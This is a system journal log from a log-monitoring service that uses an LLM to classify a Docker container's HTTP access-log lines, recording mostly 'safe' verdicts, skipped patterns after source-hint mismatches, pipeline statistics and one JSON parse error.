Mar 19 22:27:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:15.813392 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:27:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:15.813430 [analyzer] Source hint mismatch: LLM says "docker container web/api access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:27:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:18.621945 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:27:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:18.621985 [analyzer] Source hint mismatch: LLM says "docker/captain (application HTTP access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:27:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:21.710605 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:27:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:21.710641 [analyzer] Source hint mismatch: LLM says "docker container access log (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:27:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:24.556946 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:27:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:24.556979 [analyzer] Source hint mismatch: LLM says "docker-captain (web/API access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:27:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:25.808326 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:27:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:25.808363 [analyzer] Source hint mismatch: LLM says "docker container access logger / API gateway", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:27:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:27.773151 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=regex
Mar 19 22:27:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:27.773219 [analyzer] Source hint mismatch: LLM says "docker (captain web/API container access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:27:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:30.877353 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:27:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:30.877411 [analyzer] Source hint mismatch: LLM says "docker container web/app access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:27:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:33.652137 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:27:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:33.652200 [analyzer] Source hint mismatch: LLM says "docker container web/app (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:27:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:36.160748 [observer] Pipeline: processed=146 pattern_hits=78 llm_calls=67 llm_errors=1 learned=0
Mar 19 22:27:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:36.160790 [observer] Patterns: hash=78 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=68
Mar 19 22:27:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:36.581267 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:27:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:36.581301 [analyzer] Source hint mismatch: LLM says "docker container web/app access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:27:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:39.711397 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:27:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:39.711435 [analyzer] Source hint mismatch: LLM says "docker/captain-captain container web service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:27:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:42.779625 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:27:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:42.779662 [analyzer] Source hint mismatch: LLM says "docker container web/app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:27:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:45.769688 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:27:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:45.769721 [analyzer] Source hint mismatch: LLM says "docker access log / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:27:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:48.908904 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:27:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:48.908960 [analyzer] Source hint mismatch: LLM says "docker container web/app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:27:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:51.829857 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix
Mar 19 22:27:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:51.829898 [analyzer] Source hint mismatch: LLM says "docker container access log / API gateway", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:27:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:54.728051 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:27:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:54.728104 [analyzer] Source hint mismatch: LLM says "dockerized web/API service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:27:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:57.759211 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:27:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:57.759249 [analyzer] Source hint mismatch: LLM says "docker container access log / app web server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:28:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:00.926861 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:28:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:00.926894 [analyzer] Source hint mismatch: LLM says "docker/captain container web service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:28:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:03.837150 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 19 22:28:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:03.837213 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container web/API access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:28:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:06.160469 [observer] Pipeline: processed=168 pattern_hits=90 llm_calls=77 llm_errors=1 learned=0
Mar 19 22:28:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:06.160581 [observer] Patterns: hash=90 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=78
Mar 19 22:28:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:06.720556 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:28:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:06.720659 [analyzer] Source hint mismatch: LLM says "docker HTTP access log (app endpoint)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:28:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:09.555055 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:28:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:09.555093 [analyzer] Source hint mismatch: LLM says "docker container web/API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:28:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:12.668520 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:28:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:12.668553 [analyzer] Source hint mismatch: LLM says "docker container web/API access log (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:28:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:15.811079 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:28:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:15.811121 [analyzer] Source hint mismatch: LLM says "docker/captain web service access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:28:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:18.650114 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:28:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:18.650154 [analyzer] Source hint mismatch: LLM says "docker (captain-captain app HTTP access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:28:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:21.693281 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix
Mar 19 22:28:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:21.693314 [analyzer] Source hint mismatch: LLM says "docker container web/API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:28:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:24.717508 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:28:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:24.717546 [analyzer] Source hint mismatch: LLM says "docker container access logs (HTTP API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:28:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:25.708888 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:28:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:25.708926 [analyzer] Source hint mismatch: LLM says "docker container web API (app)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:28:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:27.839449 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.84 action=allow pattern_type=prefix
Mar 19 22:28:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:27.839483 [analyzer] Source hint mismatch: LLM says "docker (captain-captain) reverse proxy / app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:28:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:30.553049 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=prefix
Mar 19 22:28:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:30.553084 [analyzer] Source hint mismatch: LLM says "docker container access log (API gateway/app)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:28:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:33.728267 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:28:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:33.728302 [analyzer] Source hint mismatch: LLM says "docker/captain web access log (app container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:28:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:36.159943 [observer] Pipeline: processed=194 pattern_hits=105 llm_calls=88 llm_errors=1 learned=0
Mar 19 22:28:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:36.159967 [observer] Patterns: hash=105 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=89
Mar 19 22:28:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:36.740062 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.84 action=allow pattern_type=prefix
Mar 19 22:28:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:36.740097 [analyzer] Source hint mismatch: LLM says "docker/HTTP app access log (containerized service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:28:40 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:40.059087 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=contains
Mar 19 22:28:40 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:40.059124 [analyzer] Source hint mismatch: LLM says "docker container access log / web server (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:28:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:42.913201 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:28:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:42.913244 [analyzer] Source hint mismatch: LLM says "docker container web/API access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:28:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:45.751002 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:28:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:45.751058 [analyzer] Source hint mismatch: LLM says "docker/captain (web app/API inside container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:28:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:48.761658 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix
Mar 19 22:28:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:48.761694 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container access log / reverse proxy)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:51.909491 [llm] Failed to parse verdict from: {
Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]:   "classification": "safe",
Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]:   "confidence": 0.72,
Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]:   "reason": "Routine HTTP GET request to an API endpoint with a 304 response and latency logging; appears to be normal application access.",
Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]:   "action": "allow",
Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]:   "pattern_type": "regex",
Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]:   "pattern": "^GET /api/v2/user/apps/appData/api/logs\\?encoding=hex \\d+ <DUR>$",
Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]:   "source_hint": "docker (containerized web/app access log)",
Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]:   "variable_fields": [
Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]:     {
Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]:       "token": "GET /api/v2/user/apps/appData/api/logs?encoding=hex 304",
Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]:       "type": "request_id",
Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]:       "replacement": "<REQ_ID>"
Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]:     },
Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]:     {
Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]:       "token": "20.889 ms",
Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]:       "type": "duration",
Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]:       "replacement": "<DUR>"
Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]:     }
Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]:   ]
Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: }
Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:51.909532 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: invalid character '\x1b' in string literal
Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:51.909542 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:28:50.599272672Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:28:55 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:55.118723 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:28:55 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:55.118760 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:28:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:57.945244 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:28:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:57.945279 [analyzer] Source hint mismatch: LLM says "dockerized web API (likely application access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:29:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:00.713094 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:29:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:00.713144 [analyzer] Source hint mismatch: LLM says "docker container (web/API access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:29:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:03.734274 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:29:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:03.734312 [analyzer] Source hint mismatch: LLM says "docker container running an API service (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:29:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:06.159974 [observer] Pipeline: processed=216 pattern_hits=117 llm_calls=98 llm_errors=2 learned=0
Mar 19 22:29:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:06.159999 [observer] Patterns: hash=117 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=99
Mar 19 22:29:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:06.705895 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:29:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:06.705929 [analyzer] Source hint mismatch: LLM says "docker/captain web/API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:29:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:09.979720 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:29:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:09.979756 [analyzer] Source hint mismatch: LLM says "docker container reverse proxy / app server (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:29:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:12.589505 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:29:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:12.589539 [analyzer] Source hint mismatch: LLM says "docker (container web access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:29:16 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:16.211249 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:29:16 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:16.211290 [analyzer] Source hint mismatch: LLM says "docker/HTTP app (captain-captain container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:29:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:18.878469 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:29:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:18.878503 [analyzer] Source hint mismatch: LLM says "docker web/app access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:29:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:21.865631 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:29:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:21.865665 [analyzer] Source hint mismatch: LLM says "docker container access log (application HTTP server)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:29:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:24.865132 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:29:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:24.865186 [analyzer] Source hint mismatch: LLM says "docker/captain-captain (app web server access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:29:26 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:26.443916 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=contains
Mar 19 22:29:26 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:26.443954 [analyzer] Source hint mismatch: LLM says "docker (captain web/API container access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:29:28 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:28.033281 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=regex
Mar 19 22:29:28 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:28.033319 [analyzer] Source hint mismatch: LLM says "docker/captain web/API access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:29:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:30.781473 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:29:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:30.781509 [analyzer] Source hint mismatch: LLM says "docker container web app (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:29:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:33.729637 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:29:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:33.729674 [analyzer] Source hint mismatch: LLM says "docker (application web server access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:29:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:36.161135 [observer] Pipeline: processed=242 pattern_hits=132 llm_calls=109 llm_errors=2 learned=0
Mar 19 22:29:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:36.161177 [observer] Patterns: hash=132 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=110
Mar 19 22:29:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:36.756065 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:29:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:36.756104 [analyzer] Source hint mismatch: LLM says "docker/captain (web API access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:29:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:39.885972 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix
Mar 19 22:29:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:39.886010 [analyzer] Source hint mismatch: LLM says "docker container web/app access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:29:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:42.732342 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=prefix
Mar 19 22:29:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:42.732379 [analyzer] Source hint mismatch: LLM says "docker container access logs (web/API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:29:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:45.626940 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:29:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:45.626976 [analyzer] Source hint mismatch: LLM says "docker container reverse proxy / application HTTP access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
